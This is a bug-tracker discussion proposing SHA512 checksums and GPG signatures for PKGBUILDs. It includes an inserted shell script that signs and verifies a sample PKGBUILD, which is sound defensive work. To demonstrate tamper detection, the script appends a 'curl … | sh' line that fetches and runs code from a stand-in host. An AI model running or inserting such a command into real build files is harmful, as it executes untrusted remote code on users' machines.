Bug #747

[RFC] PKGBUILDs should include SHA512 checksum + GPG signature

g4jc - over 5 years ago. Updated over 3 years ago.

Status:
open
Priority:
discussion
Assignee:
-
% Done:
0%

Description

Gentoo is now using SHA512 + Whirlpool and GPG signed source packages. I got the idea that this great security practice could be implemented in our PKGBUILDs as well and went to work to see if it was possible. Using just a few lines of bash, it is definitely possible.

Attached you will find a proof of concept PKGBUILD I made for a file integrity checking security software that is GPL.

This could be good practice for users of AUR/ABS, etc., where PKGBUILDs can be verified safe and untampered.


Files

PKGBUILD.zip (2.1 KB) PKGBUILD.zip g4jc, 2015-06-23 03:09 AM
PKGBUILD.zip (1.9 KB) PKGBUILD.zip g4jc, 2015-06-26 03:01 AM

History

#1

Updated by g4jc over 5 years ago

Per Emulatorman we should use .sig instead of armoured .asc to keep it uniform with currently signed packages.
I can confirm this also works as simply as...
gpg --default-key [KEYID] -b PKGBUILD

Attached is another example GPG-signed PKGBUILD of a recently requested package.
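
The workflow described in the ticket (a SHA512 checksum next to a GPG-signed PKGBUILD) and the detached-signature command from the comment above, as an added, runnable example. It is not the PKGBUILD attached to this ticket and not Parabola's own tooling; it assumes gpg and GNU coreutils sha512sum are on PATH, and every name in it (sign_pkgbuild, verify_pkgbuild, the sample PKGBUILD contents, the throwaway demo key) is hypothetical:

```shell
#!/bin/sh
# Added example, not the PKGBUILD attached to this ticket and not Parabola's
# own tooling: sign a PKGBUILD with a detached binary .sig (gpg -b, as in
# comment #1), publish its SHA512 alongside, and verify both before use.
# Assumes gpg and GNU coreutils sha512sum are on PATH; every name below
# (sign_pkgbuild, verify_pkgbuild, the sample PKGBUILD, the demo key) is
# hypothetical.
set -eu

# Maintainer side: detached signature PKGBUILD.sig plus PKGBUILD.sha512.
# $1 = directory holding PKGBUILD, $2 = key ID or fingerprint to sign with.
sign_pkgbuild() {
  ( cd "$1" &&
    gpg --batch --yes --default-key "$2" -b PKGBUILD &&
    sha512sum PKGBUILD > PKGBUILD.sha512 )
}

# User side: the checksum catches accidental corruption, the signature
# catches deliberate tampering (whoever edits the file can also regenerate
# the checksum, but not the signature). Returns 0 only if both pass.
verify_pkgbuild() {
  ( cd "$1" &&
    sha512sum -c PKGBUILD.sha512 > /dev/null &&
    gpg --batch --verify PKGBUILD.sig PKGBUILD )
}

# Self-contained round trip in a throwaway GNUPGHOME: sign, verify, tamper,
# verify again. Succeeds (exit 0) only if the clean file verifies and the
# tampered file is rejected. Runs in a subshell so GNUPGHOME does not leak.
demo() (
  work=$(mktemp -d)
  GNUPGHOME=$work/gnupg; export GNUPGHOME
  mkdir -m 700 "$GNUPGHOME"
  mkdir "$work/pkg"
  # Constructed sample PKGBUILD, not a real package.
  cat > "$work/pkg/PKGBUILD" <<'EOF'
pkgname=example
pkgver=1.0
pkgrel=1
arch=('any')
source=("https://example.invalid/example-1.0.tar.gz")
sha512sums=('SKIP')
EOF
  # Unprotected throwaway key for the demo only; a real packager key
  # would of course carry a passphrase.
  gpg --batch --quiet --gen-key <<'EOF'
%no-protection
Key-Type: RSA
Key-Length: 2048
Name-Real: Example Packager
Name-Email: packager@example.invalid
Expire-Date: 0
%commit
EOF
  keyid=$(gpg --batch --with-colons --list-secret-keys |
          awk -F: '$1 == "fpr" { print $10; exit }')
  sign_pkgbuild "$work/pkg" "$keyid"
  ok=0
  if verify_pkgbuild "$work/pkg"; then
    # Tamper with the file after signing: verification must now fail.
    echo 'curl http://example.invalid/x | sh' >> "$work/pkg/PKGBUILD"
    if ! verify_pkgbuild "$work/pkg"; then ok=1; fi
  fi
  gpgconf --kill gpg-agent 2> /dev/null || true
  rm -rf "$work"
  [ "$ok" -eq 1 ]
)

case "${1:-}" in
  demo) demo && echo "clean PKGBUILD verified, tampered PKGBUILD rejected" ;;
esac
```

Run it as `sh pkgbuild-sign.sh demo` to see the round trip. The order in verify_pkgbuild is deliberate: the cheap checksum runs first, but the decision to trust the file rests on the signature, since a checksum distributed next to the file it covers can be rewritten by the same person who rewrote the file. A user verifying a real PKGBUILD still needs the packager's public key in their keyring (or a keyring distributed out of band) for `gpg --verify` to mean anything.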

#2

Updated by Anonymous about 5 years ago

g4jc wrote:

> Per Emulatorman we should use .sig instead of armoured .asc to keep it uniform with currently signed packages.
> I can confirm this also works as simply as...
> gpg --default-key [KEYID] -b PKGBUILD
>
> Attached is another example GPG-signed PKGBUILD of a recently requested package.

I suggest you open a consensus about it to devs list as official packaging policy for Parabola.

#3

Updated by lukeshu over 4 years ago

  • Priority changed from feature to discussion
  • Subject changed from PKGBUILDs should include SHA512 checksum + GPG signature to [RFC] PKGBUILDs should include SHA512 checksum + GPG signature

#4

Updated by lukeshu over 3 years ago

  • Project changed from libretools to Packages
